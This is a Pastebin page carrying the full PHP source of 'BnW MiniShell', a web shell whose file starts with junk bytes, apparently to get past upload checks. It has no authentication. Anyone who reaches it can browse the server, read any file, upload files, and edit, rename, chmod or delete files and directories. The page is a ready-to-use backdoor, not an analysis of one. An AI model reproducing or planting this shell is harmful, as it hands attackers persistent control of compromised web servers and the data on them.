Advertisement
willysec_id

BnW MiniShell

Jun 18th, 2024
679
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 8.11 KB | Cybersecurity | 0 0
  1. ?i�?<?php
  2. @session_start();
  3. @set_time_limit(0);
  4.  
  5. echo '<!DOCTYPE HTML>
  6. <HTML>
  7. <HEAD>
  8. <title></title>
  9. <style>
  10. body{
  11. font-family: monospace;
  12. font-weight: bold;
  13. font-size: 18px;
  14. background-color: #c5c5c5;
  15. color: #000;
  16. }
  17. #content tr:hover{
  18. background-color: #ccc;
  19. }
  20. #content .first{
  21. background-color: #ccc;
  22. }
  23. #content .first:hover{
  24. background-color: #ccc;
  25. }
  26. table{
  27. border: 3px #000 solid;
  28. }
  29. a{
  30. color: #000;
  31. text-decoration: none;
  32. }
  33. a:hover{
  34. color: #00f;
  35. }
  36. input,select,textarea{
  37. border: 1px #000 solid;
  38. -moz-border-radius: 5px;
  39. -webkit-border-radius:5px;
  40. border-radius:5px;
  41. }
  42. input {
  43. font-size: 18px;
  44. font-weight: bold;
  45. padding: 5px;
  46. }
  47. select {
  48. font-size: 19px
  49. }
  50. textarea {
  51. font-size: 10px
  52. }
  53. td, tr { padding: 2px 5px; }
  54.  
  55. </style>
  56. </HEAD>
  57. <BODY>
  58. <hr width="920" color="black"/>
  59. <hr width="920" color="black"/><center><p><h2>Your IP : ' .$_SERVER["REMOTE_ADDR"]. '</h2></p></center>
  60. <hr width="920" color="black"/>
  61. <table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
  62. <tr><td style="padding: 8px">Current Path : ';
  63. if(isset($_GET['path'])){
  64. $path = $_GET['path'];
  65. }else{
  66. $path = getcwd();
  67. }
  68. $path = str_replace('\\','/',$path);
  69. $paths = explode('/',$path);
  70.  
  71. foreach($paths as $id=>$pat){
  72. if($pat == '' && $id == 0){
  73. $a = true;
  74. echo '<a href="?path=/">/</a>';
  75. continue;
  76. }
  77. if($pat == '') continue;
  78. echo '<a href="?path=';
  79. for($i=0;$i<=$id;$i++){
  80. echo "$paths[$i]";
  81. if($i != $id) echo "/";
  82. }
  83. echo '">'.$pat.'</a>/';
  84. }
  85. echo '</td></tr><tr><td>';
  86. if(isset($_FILES['file'])){
  87. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  88. echo '<font color="green">Upload Success..</font><br />';
  89. }else{
  90. echo '<font color="red">Upload Gagal..</font><br />';
  91. }
  92. }
  93. echo '<form enctype="multipart/form-data" method="POST">
  94. Upload File : <input type="file" name="file" />
  95. <input type="submit" value="Upload" />
  96. </form>
  97. </td></tr>';
  98. if(isset($_GET['filesrc'])){
  99. echo "<tr><td style='padding: 8px'>Current File : ";
  100. echo $_GET['filesrc'];
  101. echo '</tr></td></table><br />';
  102. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  103. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  104. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  105. if($_POST['opt'] == 'chmod'){
  106. if(isset($_POST['perm'])){
  107. if(chmod($_POST['path'],$_POST['perm'])){
  108. echo '<font color="green">Chmod Success..</font><br />';
  109. }else{
  110. echo '<font color="red">Chmod Gagal..</font><br />';
  111. }
  112. }
  113. echo '<form method="POST">
  114. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  115. <input type="hidden" name="path" value="'.$_POST['path'].'">
  116. <input type="hidden" name="opt" value="chmod">
  117. <input type="submit" value="Save" />
  118. </form>';
  119. }elseif($_POST['opt'] == 'rename'){
  120. if(isset($_POST['newname'])){
  121. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  122. echo '<font color="green">Rename Berhasil..</font><br />';
  123. }else{
  124. echo '<font color="red">Rename Gagal..</font><br />';
  125. }
  126. $_POST['name'] = $_POST['newname'];
  127. }
  128. echo '<form method="POST">
  129. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  130. <input type="hidden" name="path" value="'.$_POST['path'].'">
  131. <input type="hidden" name="opt" value="rename">
  132. <input type="submit" value="Save" />
  133. </form>';
  134. }elseif($_POST['opt'] == 'edit'){
  135. if(isset($_POST['src'])){
  136. $fp = fopen($_POST['path'],'w');
  137. if(fwrite($fp,$_POST['src'])){
  138. echo '<font color="green">Edit File Berhasil..</font><br />';
  139. }else{
  140. echo '<font color="red">Edit File Gagal..</font><br />';
  141. }
  142. fclose($fp);
  143. }
  144. echo '<form method="POST">
  145. <textarea cols=130 rows=10 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  146. <input type="hidden" name="path" value="'.$_POST['path'].'">
  147. <input type="hidden" name="opt" value="edit">
  148. <input type="submit" value="Save" />
  149. </form>';
  150. }
  151. echo '</center>';
  152. }else{
  153. echo '</table><br /><center>';
  154. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  155. if($_POST['type'] == 'dir'){
  156. if(rmdir($_POST['path'])){
  157. echo '<font color="green">Delete Directory Berhasil..</font><br />';
  158. }else{
  159. echo '<font color="red">Delete Directory Gagal..</font><br />';
  160. }
  161. }elseif($_POST['type'] == 'file'){
  162. if(unlink($_POST['path'])){
  163. echo '<font color="green">Delete File Berhasil..</font><br />';
  164. }else{
  165. echo '<font color="red">Delete File Gagal..</font><br />';
  166. }
  167. }
  168. }
  169. echo '</center>';
  170. $scandir = scandir($path);
  171. echo '<div id="content"><table width="920" border="1.5px" cellpadding="5" cellspacing="0" align="center">
  172. <tr class="first">
  173. <td><center>Name</center></td>
  174. <td><center>Size</center></td>
  175. <td><center>Permissions</center></td>
  176. <td><center>Options</center></td>
  177. </tr>';
  178.  
  179. foreach($scandir as $dir){
  180. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  181. echo "<tr>
  182. <td><a href=\"?path=$path/$dir\">$dir</a></td>
  183. <td><center>--</center></td>
  184. <td><center>";
  185. if(is_writable("$path/$dir")) echo '<font color="Blue">';
  186. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  187. echo perms("$path/$dir");
  188. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  189.  
  190. echo "</center></td>
  191. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  192. <select name=\"opt\">
  193. <option value=\"\"></option>
  194. <option value=\"delete\">Delete</option>
  195. <option value=\"chmod\">Chmod</option>
  196. <option value=\"rename\">Rename</option>
  197. </select>
  198. <input type=\"hidden\" name=\"type\" value=\"dir\">
  199. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  200. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  201. <input type=\"submit\" value=\"Oke\" />
  202. </form></center></td>
  203. </tr>";
  204. }
  205. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  206. foreach($scandir as $file){
  207. if(!is_file("$path/$file")) continue;
  208. $size = filesize("$path/$file")/1024;
  209. $size = round($size,3);
  210. if($size >= 1024){
  211. $size = round($size/1024,2).' MB';
  212. }else{
  213. $size = $size.' KB';
  214. }
  215.  
  216. echo "<tr>
  217. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  218. <td><center>".$size."</center></td>
  219. <td><center>";
  220. if(is_writable("$path/$file")) echo '<font color="Blue">';
  221. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  222. echo perms("$path/$file");
  223. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  224. echo "</center></td>
  225. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  226. <select name=\"opt\">
  227. <option value=\"\"></option>
  228. <option value=\"delete\">Delete</option>
  229. <option value=\"chmod\">Chmod</option>
  230. <option value=\"rename\">Rename</option>
  231. <option value=\"edit\">Edit</option>
  232. </select>
  233. <input type=\"hidden\" name=\"type\" value=\"file\">
  234. <input type=\"hidden\" name=\"name\" value=\"$file\">
  235. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  236. <input type=\"submit\" value=\"Oke\" />
  237. </form></center></td>
  238. </tr>";
  239. }
  240. echo '</table>
  241. </div>';
  242. }
  243. echo '<center><hr width="920" color="black"/> <center>
  244. </BODY>
  245. </HTML>';
  246. function perms($file){
  247. $perms = fileperms($file);
  248.  
  249. if (($perms & 0xC000) == 0xC000) {
  250. // Socket
  251. $info = 's';
  252. } elseif (($perms & 0xA000) == 0xA000) {
  253. // Symbolic Link
  254. $info = 'l';
  255. } elseif (($perms & 0x8000) == 0x8000) {
  256. // Regular
  257. $info = '-';
  258. } elseif (($perms & 0x6000) == 0x6000) {
  259. // Block special
  260. $info = 'b';
  261. } elseif (($perms & 0x4000) == 0x4000) {
  262. // Directory
  263. $info = 'd';
  264. } elseif (($perms & 0x2000) == 0x2000) {
  265. // Character special
  266. $info = 'c';
  267. } elseif (($perms & 0x1000) == 0x1000) {
  268. // FIFO pipe
  269. $info = 'p';
  270. } else {
  271. // Unknown
  272. $info = 'u';
  273. }
  274.  
  275. // Owner
  276. $info .= (($perms & 0x0100) ? 'r' : '-');
  277. $info .= (($perms & 0x0080) ? 'w' : '-');
  278. $info .= (($perms & 0x0040) ?
  279. (($perms & 0x0800) ? 's' : 'x' ) :
  280. (($perms & 0x0800) ? 'S' : '-'));
  281.  
  282. // Group
  283. $info .= (($perms & 0x0020) ? 'r' : '-');
  284. $info .= (($perms & 0x0010) ? 'w' : '-');
  285. $info .= (($perms & 0x0008) ?
  286. (($perms & 0x0400) ? 's' : 'x' ) :
  287. (($perms & 0x0400) ? 'S' : '-'));
  288.  
  289. // World
  290. $info .= (($perms & 0x0004) ? 'r' : '-');
  291. $info .= (($perms & 0x0002) ? 'w' : '-');
  292. $info .= (($perms & 0x0001) ?
  293. (($perms & 0x0200) ? 't' : 'x' ) :
  294. (($perms & 0x0200) ? 'T' : '-'));
  295.  
  296. return $info;
  297. }
  298. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement